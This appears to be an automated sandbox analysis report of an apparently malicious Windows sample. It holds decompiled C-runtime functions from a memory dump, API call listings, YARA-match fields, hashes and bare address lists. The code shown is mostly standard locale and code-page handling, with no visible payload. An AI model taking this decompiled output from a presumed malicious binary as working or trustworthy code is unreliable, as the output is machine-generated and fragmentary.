                    			E01406B96(void* __eflags) {
                    				int _t15;
                    				void* _t28;
                    
                    				E013F3660(0x1433bb0, 0xc);
                    				 *(_t28 - 0x1c) =  *(_t28 - 0x1c) & 0x00000000;
                    				E01400941( *((intOrPtr*)( *((intOrPtr*)(_t28 + 8)))));
                    				 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
                    				 *0x143a738 = E01406C42( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t28 + 0xc)))))));
                    				_t15 = EnumSystemLocalesW(E01406B50, 1);
                    				asm("ror eax, cl");
                    				 *0x143a738 = 0 ^  *0x1435234;
                    				 *(_t28 - 0x1c) = _t15;
                    				 *(_t28 - 4) = 0xfffffffe;
                    				E01406C0E();
                    				return E013F36A6(0x20);
                    			}

                    APIs
                      • Part of subcall function 01400941: EnterCriticalSection.KERNEL32(?,?,0140122A,00000000,01433A08,0000000C,014011E5,?,?,?,014009E5,?,?,01406AB6,00000001,00000364), ref: 01400950
                    • EnumSystemLocalesW.KERNEL32(01406B50,00000001,01433BB0,0000000C), ref: 01406BCE
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: CriticalEnterEnumLocalesSectionSystem
                    • String ID:
                    • API String ID: 1272433827-0
                    • Opcode ID: 963e6f3caec31159bc12c0570d14adc1a8088355c7431e3141858bcd7cfe9e76
                    • Instruction ID: 945318a25a1267b861eea256765288957682e383dce332d639650293b682e2f1
                    • Opcode Fuzzy Hash: 963e6f3caec31159bc12c0570d14adc1a8088355c7431e3141858bcd7cfe9e76
                    • Instruction Fuzzy Hash: 94F06D32A542019FDB21EF6AD489B5D37F0FB14720F21806AF401DF2E4CB7489508F81
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0140F72B(void* __ecx, void* __edx, signed char* _a4) {
                    				intOrPtr _t9;
                    				signed char* _t13;
                    				void* _t14;
                    				intOrPtr* _t16;
                    				void* _t20;
                    				void* _t22;
                    
                    				_t20 = E01406A01(_t14, __ecx, __edx);
                    				_t16 =  *((intOrPtr*)(_t20 + 0x54));
                    				_t22 = _t16 + 2;
                    				do {
                    					_t9 =  *_t16;
                    					_t16 = _t16 + 2;
                    				} while (_t9 != 0);
                    				 *(_t20 + 0x64) = 0 | _t16 - _t22 >> 0x00000001 == 0x00000003;
                    				EnumSystemLocalesW(E0140F682, 1);
                    				_t13 = _a4;
                    				if(( *_t13 & 0x00000004) == 0) {
                    					 *_t13 = 0;
                    					return _t13;
                    				}
                    				return _t13;
                    			}

                    APIs
                      • Part of subcall function 01406A01: GetLastError.KERNEL32(00000000,?,013FEF5F,?,00000000,?,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A05
                      • Part of subcall function 01406A01: _free.LIBCMT ref: 01406A38
                      • Part of subcall function 01406A01: SetLastError.KERNEL32(00000000,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A79
                      • Part of subcall function 01406A01: _abort.LIBCMT ref: 01406A7F
                    • EnumSystemLocalesW.KERNEL32(0140F682,00000001,?,?,?,0140FEED,014050D7,?,?,?,?,?,014050D7,?,?,?), ref: 0140F762
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                    • String ID:
                    • API String ID: 1084509184-0
                    • Opcode ID: b5bf68ea1f2253694bf9b4d6ed1ea1dfeeb27b1ec7806b4b1265839434a82734
                    • Instruction ID: ea964284cc033b509c8cc69e0b240f74ea091048ad03ee7533a755cb3216caae
                    • Opcode Fuzzy Hash: b5bf68ea1f2253694bf9b4d6ed1ea1dfeeb27b1ec7806b4b1265839434a82734
                    • Instruction Fuzzy Hash: 69F05C3930020557CB16AF3BC8146667F50FFC2754B17407DEE05CB2A1C6719947CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 01418BD4
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: ContextCryptRelease
                    • String ID:
                    • API String ID: 829835001-0
                    • Opcode ID: 333bdf02932b156c16a451d8da2a5758ab9403fd55fdfbcd3f89b1bcd2bcdc67
                    • Instruction ID: 008a2a1c0777951f0bf5553db523e9a3e409b2f5837f4121e4e6e426fb81d960
                    • Opcode Fuzzy Hash: 333bdf02932b156c16a451d8da2a5758ab9403fd55fdfbcd3f89b1bcd2bcdc67
                    • Instruction Fuzzy Hash: B4E0C2B6A01254A7EA705E4CBC04B873B58BB00B18F180909BB40AFBA8C3B0E4814795
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 013EA323
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: ContextCryptRelease
                    • String ID:
                    • API String ID: 829835001-0
                    • Opcode ID: 2c3218327f45e68bd54fa6894e9c65eea88a7245a36c560e53d6714f94e31ce3
                    • Instruction ID: 8e6cb3ce167c4cd7f234cd5af8b7e298abcf8b0ad9d3e40c6561a4433ab420d8
                    • Opcode Fuzzy Hash: 2c3218327f45e68bd54fa6894e9c65eea88a7245a36c560e53d6714f94e31ce3
                    • Instruction Fuzzy Hash: 81D05EB174836153E2345E1C9C08B8B7EC85F21B59F58881DFA84E72D0D6B0D48583A4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 013EA300
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: ContextCryptRelease
                    • String ID:
                    • API String ID: 829835001-0
                    • Opcode ID: ba264fa80afdff680b8c02b7eed99571290dc1d4d5d7bbb8c034718e4451e89e
                    • Instruction ID: 18e1e5f36ed4779f8307d5efc28dcf59d190882dd3d693bc5ab1c93d1e044ebf
                    • Opcode Fuzzy Hash: ba264fa80afdff680b8c02b7eed99571290dc1d4d5d7bbb8c034718e4451e89e
                    • Instruction Fuzzy Hash: 00C09270B00254A7EF308E25DE8DB117EA8AB08B88F3885C8A549DB2C5CBB7D002D650
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 0
                    • API String ID: 0-4108050209
                    • Opcode ID: 265f2ed19ec5c82c5ac906a1a3a706e16a29a61a8b54f9274ac42e629da53273
                    • Instruction ID: d80405b40e1998c299ad42fcd82db3072d5c8539f814f2bcc1331c2c19eba8ec
                    • Opcode Fuzzy Hash: 265f2ed19ec5c82c5ac906a1a3a706e16a29a61a8b54f9274ac42e629da53273
                    • Instruction Fuzzy Hash: 8651563020060696EB37897F459DFBF2BA9AB61200F08053BDA46D73F2D6F5D6468351
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: @
                    • API String ID: 0-2766056989
                    • Opcode ID: ab6dae157520c5cdcd7822e248a79d0d1a8c906a74282b738654c90c1ec9c864
                    • Instruction ID: 5eba0c9fc5205e27eff4840fa57311eac3060314058c868cd394c5c1aaf67504
                    • Opcode Fuzzy Hash: ab6dae157520c5cdcd7822e248a79d0d1a8c906a74282b738654c90c1ec9c864
                    • Instruction Fuzzy Hash: D69152318087899BE716CF2CC5417EAB7E1AFD931CF18971DFEC862252E731A6858781
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c8498c4b2b5f312184cb2dd3880721836427b05f5522ca2e1fb3cc480f0d941e
                    • Instruction ID: d36ac4fc17e41953f13d90605d4add81695f8aaae1c4bb2dba294d1eea9f8c8a
                    • Opcode Fuzzy Hash: c8498c4b2b5f312184cb2dd3880721836427b05f5522ca2e1fb3cc480f0d941e
                    • Instruction Fuzzy Hash: 4032D321D25F414DD7339939C832336A648AFB62C5F95D737F81AB5ABAEB7981C34100
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ba5ae74ac2bf9cb80f3cc4cdd6f56de750786cf4933d173e7889a830affff402
                    • Instruction ID: e10d16e43aad7e68feaf253d3abe46336ec2b7502e460edd3f4477d3d29f29ea
                    • Opcode Fuzzy Hash: ba5ae74ac2bf9cb80f3cc4cdd6f56de750786cf4933d173e7889a830affff402
                    • Instruction Fuzzy Hash: C6320525D29F014DD7335939D82233AA688EFB72C5F55D737E81AB5AAAEB38C4C34104
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: Exception@8Throw
                    • String ID:
                    • API String ID: 2005118841-0
                    • Opcode ID: d153776487e86a9fcffdd5794637cd12cb96b1df226caac8f6dc79c203b46955
                    • Instruction ID: 9583da9a993827614bda59514bcf98bc04d0bcf2ec34773814c4d9a717f7a229
                    • Opcode Fuzzy Hash: d153776487e86a9fcffdd5794637cd12cb96b1df226caac8f6dc79c203b46955
                    • Instruction Fuzzy Hash: 664202B49001648FD755CF2DE894979BBF1FF49300B49418AE899DB3B6C634EA64CF60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 713ca02069b4829a30182f3d5ccfb028b850c5d94486557eec992ce16e968a39
                    • Instruction ID: bbb1ad1bd817671f9ff14f71bba21eda946b1b4c25299379431abfafcc1ee39d
                    • Opcode Fuzzy Hash: 713ca02069b4829a30182f3d5ccfb028b850c5d94486557eec992ce16e968a39
                    • Instruction Fuzzy Hash: 8A123F75A0132A8FDF14DFACD498AAE7BF9EF58204B14446DE906DB290DB31ED11CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8b0fb6a0ecbcd4030b2f063e499153719d7e2d31363c3b08910a14a5d3467016
                    • Instruction ID: c16c1b2b47817057712fe218e2852fcc450292277e778787a89c29e3aa33177e
                    • Opcode Fuzzy Hash: 8b0fb6a0ecbcd4030b2f063e499153719d7e2d31363c3b08910a14a5d3467016
                    • Instruction Fuzzy Hash: 6E124075B0132A9FDF04DFA9C598AAE7BF9AF49308B14406CE905EB290DB71ED11CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0aea5edfbf7e8e3ee1d2703e479a0cd26e72b9be7237fd22b8490183feddcbac
                    • Instruction ID: 83c9cf30b3976383baa80135b1f4d0af213096116b6e4f5aa85f6fef3aa6ac09
                    • Opcode Fuzzy Hash: 0aea5edfbf7e8e3ee1d2703e479a0cd26e72b9be7237fd22b8490183feddcbac
                    • Instruction Fuzzy Hash: C822FA717042118FDB48CF1DDCA574AB7E2EFC4358F0E8168A8498BB62D639DC958B86
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    C-Code - Quality: 80%
                    			E01400AE6(void* __edx, intOrPtr* _a4) {
                    				signed int _v8;
                    				char _v21;
                    				intOrPtr _v22;
                    				struct _cpinfo _v28;
                    				void* _v32;
                    				void* _v36;
                    				void* _v40;
                    				intOrPtr* _v44;
                    				signed int _v48;
                    				void* _v52;
                    				signed int* _v56;
                    				intOrPtr _v60;
                    				intOrPtr* _v64;
                    				signed int* _v68;
                    				void* _v72;
                    				char _v76;
                    				void* __ebx;
                    				void* __ebp;
                    				signed int _t101;
                    				signed int _t104;
                    				intOrPtr* _t106;
                    				signed int _t122;
                    				signed short _t125;
                    				void* _t129;
                    				void* _t133;
                    				void* _t136;
                    				void* _t137;
                    				intOrPtr _t138;
                    				void* _t140;
                    				signed int _t141;
                    				intOrPtr* _t142;
                    				signed char _t159;
                    				signed char _t164;
                    				signed int _t165;
                    				void* _t167;
                    				signed int _t168;
                    				intOrPtr _t170;
                    				void* _t177;
                    				signed int* _t178;
                    				signed int* _t179;
                    				signed int _t180;
                    				signed char* _t187;
                    				signed char* _t188;
                    				void* _t191;
                    				signed int _t193;
                    				intOrPtr _t195;
                    				short* _t207;
                    				intOrPtr* _t208;
                    				intOrPtr* _t212;
                    				signed int _t213;
                    				signed int _t214;
                    				void* _t215;
                    				void* _t216;
                    
                    				_t101 =  *0x1435234; // 0x78d9f939
                    				_v8 = _t101 ^ _t214;
                    				_t208 = _a4;
                    				_t168 = 0;
                    				_v64 = _t208;
                    				_v32 = 0;
                    				_t170 =  *((intOrPtr*)(_t208 + 0xa8));
                    				_v36 = 0;
                    				_v40 = 0;
                    				_v52 = 0;
                    				_v76 = _t208;
                    				_v72 = 0;
                    				if(_t170 == 0) {
                    					__eflags =  *(_t208 + 0x8c);
                    					if( *(_t208 + 0x8c) != 0) {
                    						asm("lock dec dword [eax]");
                    					}
                    					 *(_t208 + 0x8c) = _t168;
                    					_t104 = 0;
                    					__eflags = 0;
                    					 *(_t208 + 0x90) = _t168;
                    					 *_t208 = 0x14228f8;
                    					 *((intOrPtr*)(_t208 + 0x94)) = 0x1422b78;
                    					 *((intOrPtr*)(_t208 + 0x98)) = 0x1422cf8;
                    					 *((intOrPtr*)(_t208 + 4)) = 1;
                    					L41:
                    					return E013F268B(_t104, _v8 ^ _t214);
                    				}
                    				_t106 = _t208 + 8;
                    				_v44 = 0;
                    				if( *_t106 != 0) {
                    					L3:
                    					_v44 = E014009B2(_t170, 1, 4);
                    					E014012E1(_t168);
                    					_v32 = E014009B2(_t170, 0x180, 2);
                    					E014012E1(_t168);
                    					_v36 = E014009B2(_t170, 0x180, 1);
                    					E014012E1(_t168);
                    					_v40 = E014009B2(_t170, 0x180, 1);
                    					E014012E1(_t168);
                    					_t195 = E014009B2(_t170, 0x101, 1);
                    					_v52 = _t195;
                    					E014012E1(_t168);
                    					_t216 = _t215 + 0x3c;
                    					if(_v44 == _t168 || _v32 == _t168 || _t195 == 0 || _v36 == _t168 || _v40 == _t168) {
                    						L36:
                    						E014012E1(_v44);
                    						E014012E1(_v32);
                    						E014012E1(_v36);
                    						E014012E1(_v40);
                    						_t168 = 1;
                    						__eflags = 1;
                    						goto L37;
                    					} else {
                    						_t122 = _t168;
                    						do {
                    							 *(_t122 + _t195) = _t122;
                    							_t122 = _t122 + 1;
                    						} while (_t122 < 0x100);
                    						if(GetCPInfo( *(_t208 + 8),  &_v28) == 0) {
                    							goto L36;
                    						}
                    						_t125 = _v28;
                    						_t232 = _t125 - 5;
                    						if(_t125 > 5) {
                    							goto L36;
                    						}
                    						_t28 = _t195 + 1; // 0x1
                    						_v48 = _t125 & 0x0000ffff;
                    						_t129 = E014097D9(_t168, _t232, _t168,  *((intOrPtr*)(_t208 + 0xa8)), 0x100, _t28, 0xff, _v36 + 0x81, 0xff,  *(_t208 + 8), _t168);
                    						_t216 = _t216 + 0x24;
                    						_t233 = _t129;
                    						if(_t129 == 0) {
                    							goto L36;
                    						}
                    						_t34 = _t195 + 1; // 0x1
                    						_t133 = E014097D9(_t168, _t233, _t168,  *((intOrPtr*)(_t208 + 0xa8)), 0x200, _t34, 0xff, _v40 + 0x81, 0xff,  *(_t208 + 8), _t168);
                    						_t216 = _t216 + 0x24;
                    						if(_t133 == 0) {
                    							goto L36;
                    						}
                    						if(_v48 <= 1 || _v22 == _t168) {
                    							L22:
                    							_v60 = _v32 + 0x100;
                    							_t136 = E01409CD8(_t239, _t168, 1, _t195, 0x100, _v32 + 0x100,  *(_t208 + 8), _t168);
                    							_t216 = _t216 + 0x1c;
                    							if(_t136 == 0) {
                    								goto L36;
                    							}
                    							_t191 = _v32;
                    							_t137 = _t191 + 0xfe;
                    							 *_t137 = 0;
                    							_t177 = _v36;
                    							_v32 = _t137;
                    							_t138 = _v40;
                    							 *(_t177 + 0x7f) = _t168;
                    							_t178 = _t177 - 0xffffff80;
                    							 *(_t138 + 0x7f) = _t168;
                    							_v68 = _t178;
                    							 *_t178 = _t168;
                    							_t179 = _t138 + 0x80;
                    							_v56 = _t179;
                    							 *_t179 = _t168;
                    							if(_v48 <= 1 || _v22 == _t168) {
                    								L32:
                    								_t180 = 0x3f;
                    								memcpy(_t191, _t191 + 0x200, _t180 << 2);
                    								_push(0x1f);
                    								asm("movsw");
                    								_t140 = memcpy(_v36, _v36 + 0x100, 0 << 2);
                    								_push(0x1f);
                    								asm("movsw");
                    								asm("movsb");
                    								_t141 = memcpy(_t140, _t140 + 0x100, 0 << 2);
                    								asm("movsw");
                    								asm("movsb");
                    								_t212 = _v64;
                    								if( *((intOrPtr*)(_t212 + 0x8c)) != 0) {
                    									asm("lock xadd [ecx], eax");
                    									if((_t141 | 0xffffffff) == 0) {
                    										E014012E1( *(_t212 + 0x90) - 0xfe);
                    										E014012E1( *(_t212 + 0x94) - 0x80);
                    										E014012E1( *(_t212 + 0x98) - 0x80);
                    										E014012E1( *((intOrPtr*)(_t212 + 0x8c)));
                    									}
                    								}
                    								_t142 = _v44;
                    								 *_t142 = 1;
                    								 *((intOrPtr*)(_t212 + 0x8c)) = _t142;
                    								 *_t212 = _v60;
                    								 *(_t212 + 0x90) = _v32;
                    								 *(_t212 + 0x94) = _v68;
                    								 *(_t212 + 0x98) = _v56;
                    								 *(_t212 + 4) = _v48;
                    								L37:
                    								E014012E1(_v52);
                    								_t104 = _t168;
                    								goto L41;
                    							} else {
                    								_t187 =  &_v21;
                    								while(1) {
                    									_t159 =  *_t187;
                    									if(_t159 == 0) {
                    										break;
                    									}
                    									_t213 =  *(_t187 - 1) & 0x000000ff;
                    									if(_t213 > (_t159 & 0x000000ff)) {
                    										L30:
                    										_t187 =  &(_t187[2]);
                    										if( *(_t187 - 1) != _t168) {
                    											continue;
                    										}
                    										break;
                    									}
                    									_t207 = _t191 + 0x100 + _t213 * 2;
                    									do {
                    										_t213 = _t213 + 1;
                    										 *_t207 = 0x8000;
                    										_t207 = _t207 + 2;
                    									} while (_t213 <= ( *_t187 & 0x000000ff));
                    									goto L30;
                    								}
                    								goto L32;
                    							}
                    						} else {
                    							_t188 =  &_v21;
                    							while(1) {
                    								_t164 =  *_t188;
                    								if(_t164 == 0) {
                    									goto L22;
                    								}
                    								_t193 =  *(_t188 - 1) & 0x000000ff;
                    								_t165 = _t164 & 0x000000ff;
                    								while(_t193 <= _t165) {
                    									 *((char*)(_t193 + _t195)) = 0x20;
                    									_t193 = _t193 + 1;
                    									__eflags = _t193;
                    									_t165 =  *_t188 & 0x000000ff;
                    								}
                    								_t188 =  &(_t188[2]);
                    								_t239 =  *(_t188 - 1) - _t168;
                    								if( *(_t188 - 1) != _t168) {
                    									continue;
                    								}
                    								goto L22;
                    							}
                    							goto L22;
                    						}
                    					}
                    				}
                    				_push(_t106);
                    				_push(0x1004);
                    				_push(_t170);
                    				_push(0);
                    				_push( &_v76);
                    				_t167 = E01409B26(__edx);
                    				_t216 = _t215 + 0x14;
                    				if(_t167 != 0) {
                    					goto L36;
                    				}
                    				goto L3;
                    			}

                    0x01400d62
                    0x01400d64
                    0x01400d67
                    0x01400d69
                    0x01400d72
                    0x01400d74
                    0x01400d76
                    0x01400d77
                    0x01400d82
                    0x01400d87
                    0x01400d8b
                    0x01400d99
                    0x01400dac
                    0x01400dba
                    0x01400dc5
                    0x01400dca
                    0x01400d8b
                    0x01400dcd
                    0x01400dd0
                    0x01400dd6
                    0x01400ddf
                    0x01400de4
                    0x01400ded
                    0x01400df6
                    0x01400dff
                    0x01400e2a
                    0x01400e2d
                    0x01400e33
                    0x00000000
                    0x01400d0a
                    0x01400d0a
                    0x01400d0d
                    0x01400d0d
                    0x01400d11
                    0x00000000
                    0x00000000
                    0x01400d13
                    0x01400d1c
                    0x01400d3a
                    0x01400d3a
                    0x01400d40
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01400d40
                    0x01400d24
                    0x01400d27
                    0x01400d2c
                    0x01400d2d
                    0x01400d30
                    0x01400d36
                    0x00000000
                    0x01400d27
                    0x00000000
